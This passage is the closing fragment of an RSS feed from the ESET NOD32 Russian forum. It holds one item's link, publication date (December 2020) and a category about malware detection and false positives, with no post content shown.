			<link>http://forum.esetnod32.ru/messages/forum6/topic16266/message111477/</link>
			<guid>http://forum.esetnod32.ru/messages/forum6/topic16266/message111477/</guid>
			<pubDate>Tue, 29 Dec 2020 12:33:43 +0300</pubDate>
			<category>Обнаружение вредоносного кода и ложные срабатывания</category>
		</item>
	</channel>
</rss>
